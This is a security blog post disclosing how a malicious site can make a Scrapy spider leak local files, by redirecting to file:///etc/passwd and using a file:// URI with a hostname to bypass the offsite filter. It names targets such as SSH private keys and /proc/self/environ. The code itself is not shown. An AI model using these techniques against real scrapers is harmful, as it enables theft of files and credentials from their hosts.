“Web scraping considered dangerous”: Leaking files from the spider’s host
--
This is the next post of this serie called “Web scraping considered dangerous”. You can read the previous post here and as an update, my pull request fixing FormRequest.from_response
behaviour was merged!
This post is again based on scrapy (version 1.6.0
) and I’ll show two techniques to leak files from the spider’s host, however it’s not that easy since the website must meet certain requirements to make this exploitation successful. Let’s go the facts!
Website’s structure premise
Websites return data in multiple data formats ( html, xml, json, csv, plaintext, etc
) and to do the exploitation exposed in this post there’s a tight relationship between the data format and the website structure. I’m going to simplify the scenario choosing the plaintext
data format since:
- It doesn’t meet a format (in comparison to i.e. JSON), then the spider is more tolerant to process different data (expected content vs injected content).
- Most files can be read as plain text files :)
- It will be clearer later.
Based on my first decision on the data format, the website must meet the following requirement:
It must have an endpoint returning plain text data that is used to do next requests. It doesn’t matter what type of data format the rest of the endpoints return.
In example, it could be a website that has a category sitemap endpoint that returns a list of categories and then the spider requests each of these categories.
Case 1
Continuing with the previous idea, our first case can be drawn exactly under the premise:
/sitemap
endpoints contains a list of categories in the website. It’s a list in plain text, each category separated by a newline (plaintext
format)./category?name=<category>
returns the number of products in the category.
Using Flask, we can create a web application running at http://dangerous.tld
and the underlying code will look like:
If we want to get the number of products, we will need to create a scrapy spider like this:
This spider goes to the /sitemap
endpoint, gets the list of categories and requests the page of each one of them, yielding the number of products of each category. It’s the output of the spider:
Everything works well, but what about the website becoming a malicious actor?
Our old friend, redirect!
As mentioned in our previous post, there’s an issue with the OffsiteMiddleware and in my words:
However, an interesting behavior happens when there’s a request to a page in an allowed domain but redirects to a not allowed domain, since it won’t be filtered and will be processed by the spider.
Ok, being a malicious actor I could modify the web application to create a redirect from /sitemap
endpoint to a URL of my choice. When the spider runs, it will request /sitemap
endpoint and follow the redirect, then in parse
method it will split the response in lines and exfiltrate the contents to /category?name=<line>
, using as many requests as lines in the response.
What should be the URL of my choice? It’s a kind of SSRF (or as I’ve dubbed “Spider-Side Request Forgery”) then we have:
- If the spider is running on the cloud, the URL could be a metadata URL.
- Local services (as I did in the previous post)
- LAN servers
Something else? scrapy tries to mimic a lot of browser behavior but it’s not a real browser. How it supports requestinghttps
or s3
URLs? It uses downloader handlers and there’s also a file handler. It allows to support the file
protocol, then file:///etc/passwd
is a valid URI that will get translated to /etc/passwd
on the spider’s filesystem.
Can we redirect /sitemap
to file:///etc/passwd
and exfiltrate that file? Yep, we’re transforming this to SSRF+LFI.
Now, we modify our malicious app to look like this:
When the spider runs, in the server we will receive the following output:
With our malicious app, we’ve successfully exfiltrated /etc/passwd
from the spider’s host. As the category
endpoint returns a JSON
response without caring about the input, the spider leaks the file and doesn’t raise any error. What other sensitive files are available?
/proc/self/environ
and friends- Files in
/etc
- Files like
/.dockerenv
if they exist
With this spider, to get a private SSH key we would need two spider runs: one to get /etc/passwd
to get the local user and the second to try /home/<user>/.ssh/id_rsa
. I did something similar in 2014 in “Exploiting the scraper” post (one spider run but a different kind of spider).
In fact, it all depends on the combination of website structure + spider how much information you can leak and how many spider runs it will require. In the worst case, you could create a malicious app that create a vicious flow circle and exfiltrate a long number of files in one spider run.
It’s important to note: as scrapy makes asynchronous requests, we can’t assure integrity of the exfiltrated file. In example, if we exfiltrate a file like a private SSH key that contains around 27 lines, we will receive its content shuffled and we will have to reorder somehow (I guess bruteforce) to get the original file.
Case 2
Now, we’re going to change the web application. Sometimes we have to visit a page to get server-side information needed for next steps. In this case, the web application will generate a token at /token_sitemap
that we need to add to the next requests to /token_category
. Here’s the new application:
The template first.html
is simple, it echoes the url
parameter in an anchor
tag:
A spider for this new website should be like this:
In parse
, it uses an XPath selector to get the full URL (included the token
) from the response body and requests it. The spider works and gets the number of products in the category.
Let’s be malicious now!
In our application, at token_sitemap
endpoint we’re passing a URL to the template. What if we change this URL to be the file:///etc/passwd
? This is the change:
Running the spider (always in DEBUG
mode) I get the following output:
Nothing happened. If we review manually the endpoint, this is the response:
It’s correctly extracted by the spider and the request is created, but it doesn’t reach the malicious webserver and there’s not any error message . We have to dig into it.
Debugging what’s happening
My first suspect was the OffsiteMiddleware because in the redirect
case we avoid it but maybe we’re hitting it now and that’s why the request to file:///etc/passwd
is not done. It’s weird too because this middleware usually shows offsite messages but not in this case. The full middleware file is here, but we’re going to review only the interesting parts:
result
argument contains our Request
object with url=file:///etc/passwd
. At line 4, there’s a check: first condition x.dont_filter
is False
and second condition logic is at line 18.
In short, should_follow()
verifies if the hostname of the url
matches the host_regex
regular expression. This regular expression is related to allowed_domains
attribute in the spider, then it checks if the url
hostname is dangerous.tld
or a subdomain of it. From the python console, we have this:
Our url=file:///etc/passwd
doesn’t have a hostname, then the check fails. The flow continues at line 7 and line 8 makes again a check about the hostname
of our url
, as it’s None
it won’t enter the if
logic and that’s why the offsite warning is not emmited by scrapy. Anyway, our request will be discarded.
Can a file
protocol URI have a hostname? I didn’t know but according to the RFC, yep. Taking this in consideration, our newurl
becomes file://dangerous.tld/etc/passwd
.
Running the spider again, we can see the log exfiltrating /etc/passwd
bypassing OffsiteMiddleware
🏆 :
Conclusions
When you do web scraping, it’s one way flow: the spider extracts information from the website and not the other way around. However, in presence of a serie of factors, malicious actors might be able to exfiltrate data from spiders’ hosts, compromising private information in an unexpected way.
In my opinion, the lessons from this post are:
- Run your spiders in isolated environments.
- There’s a thing about the
file
protocol. It’s useful in cases like starting a spider with a local file as initial input to test something, but apart from that, it’s not quite used. How about making a change of schema fromhttps
tofile
as seen in the redirect exploitation? Is that allowed by the browsers? How do I protect myself from that, if I scrape a website only usinghttps
URLs, there’s a setting to only accepthttp/https
URLs and reduce my attack surface? - The redirect issue is a serious concern.
I’m going to report these issues and collaborate to find a solution with the scrapy development team. I hope that for the next post I’ll have some news about these concerns and how we fix them.